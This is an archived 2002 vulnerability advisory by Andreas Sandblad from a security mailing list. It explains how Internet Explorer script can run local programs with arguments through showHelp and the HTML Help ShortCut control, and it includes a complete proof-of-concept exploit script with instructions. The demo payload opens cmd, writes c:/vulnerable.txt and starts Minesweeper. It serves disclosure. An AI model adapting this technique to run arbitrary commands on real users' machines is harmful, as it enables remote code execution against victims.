OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Andreas Sandblad (sandblad_at_acc.umu.se)
Date: Wed Nov 06 2002 - 13:48:03 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                      - Sandblad advisory #10 -

    ----------------------------------------------------------------
    Title: "How to execute programs with parameters in IE"
    Date: [2002-11-06]
    Software: Internet Explorer (webbrowser control)
    Vendor: http://www.microsoft.com/
    Impact: Javascript in "Internet zone" may
                execute programs with parameters _ _
                                                     o' \,=./ `o
    Author: Andreas Sandblad, sandbladacc.umu.se (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

    TABLE OF CONTENTS:
    ==================
    Introduction ................................................. 1
    Vendor status ................................................ 2
    Details ...................................................... 3
    Exploit ...................................................... 4
    Disclaimer ................................................... 5
    Feedback ..................................................... 6

    (1) INTRODUCTION:
    =================
    By default all internet contents such as homepages are placed in the
    "Internet zone". Local content viewed in IE runs in the "Local computer
    zone" with less restrictions.

    In the past we have seen many vulnerabilities where script in the
    "Internet zone" could access the "Local computer zone". The script could
    do actions like:
    - Read local files if the exact path is known and file can be opened by
    IE.
    - Execute local programs (exact path required) WITHOUT parameters using
    the codebase attack.

    It will be shown in this document how script in the "Local computer zone"
    can actually be designed to run arbitrary programs WITH parameters (exact
    path not needed). The technique used may open up far more dangerous
    attacks than seen before.

    (2) VENDOR STATUS:
    ==================
    Microsoft was initially contacted 2002-10-04. After several mail
    exchanges, their final response were that the technique used to run
    programs with parameters from the "Local computer zone" was no security
    vulnerability. A fix should instead be applied for all possibilities for
    content in the "Internet zone" to access the "Local computer zone".

    (3) DETAILS:
    ============
    Javascript can use the showHelp command to do one of the following two
    operations:
    1. Open a local compiled help file (.chm) in a separate winhelp window.
    2. Open an url (must begin with http://) in a separate winhelp window.
    Script in window opened as (1) may use the shortcut command (activeX
    control) to run programs with parameters, but (2) may not. Nothing
    strange, normal security restrictions.

    After some investigations I found a way to make (2) use the shortcut
    command. The following must be done:
    3. Script in (2) gets access to the "Local computer zone".
    4. Script in (2) changes url to "mk:MSITStore:C:" or similiar.
    5. A local compiled help file must have been opened since IE was first
    started. Any help file will do. For example showHelp("iexplore.chm").

    In order to achieve (3) there are several nonpatched "cross site/zone
    scripting" vulnerabilites to use. To achieve (4) a new window must be
    created from (2). By using the "opener" object it is possible to keep
    control of the winhelp window (2) even after the url is changed. (5) is
    trivial to achieve and will not affect the winhelp window for (2), since
    it is opened in a different window by default.

    Before MS02-055 was released by Microsoft the above were a lot more easier
    to perform. (3) and (4) could then be skipped.

    (4) EXPLOIT:
    ============
    The exploit uses a nonpatched "cross site/zone scripting" vulnerability
    published by Liu Die Yu 2002-10-01 to Bugtraq:
    http://online.securityfocus.com/archive/1/293692
    It could also be possible to use one of the many "cross site/zone
    scripting" vulnerabilities Greymagic found:
    http://sec.greymagic.com/adv/gm012-ie/
    Recently I reported a new "cross site/zone scripting" vulnerability to
    Microsoft that could also be used. But since no patch is yet produced,
    information about it will not be published.

    In order for not having to put script in 3 separate files I have combined
    them into one single file. The script will check for text after the # sign
    in the url to determine what to perform (url's hash). If your computer is
    heavily loaded, then the value of the setTimeout timer has to be
    increased. The timer is needed because the "mk:MSITStore:C:" url is not
    set directly by IE.

    INSTRUCTIONS:
    1. Copy the content below and place it in a html file.
    2. REMOVE THE * FROM THE SCRIPT TAG.
    3. Place the file on a remote webserver and load it in IE (URL MUST START
    WITH http://).
    4. The script will open up a dos window and display a line of text, create
    the file c:/vulnerable.txt (write permission required) and start winmine
    (this excellent game must exist). The help window for IE will not be
    closed.

    TESTED:
    Win2000 pro, XP, IE 6 (latest patches).

    --------------------------- CUT HERE ---------------------------
    <*script>
    // "How to execute programs with parameters in IE", 2002-11-06
    // Sandblad advisory #10, Andreas Sandblad, sandbladacc.umu.se
    prog = 'cmd';
    args = '/k echo You are vulnerable (Sandblad #10) & '+
           'echo Sandblad #10 > c:/vulnerable.txt & winmine';

    if (!location.hash) {
      showHelp(location+"#1");
      showHelp("iexplore.chm");
      blur();
    }
    else if (location.hash == "#1")
      open(location+"2").blur();
    else {
      f = opener.location.assign;
      opener.location="res:";
      f("javascript:location.replace('mk:MSITStore:C:')");
      setTimeout('run()',1000);
    }
    function run() {
      f("javascript:document.write('<object id=c1 classid=clsid:adb"+
       "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
       "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
       "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
       "-00aa003b7a11><param name=Command value=Close></object>')");
      f("javascript:c1.Click();c2.Click();");
      close();
    }
    </script>
    --------------------------- CUT HERE ---------------------------

    (5) Disclaimer:
    ===============
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.

    (6) Feedback:
    =============
    Please send suggestions and comments to: _ _
    sandbladacc.umu.se o' \,=./ `o
                                                        (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    Andreas Sandblad, student in Engineering Physics and
    Computing Science at Umea University, Sweden.
    -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--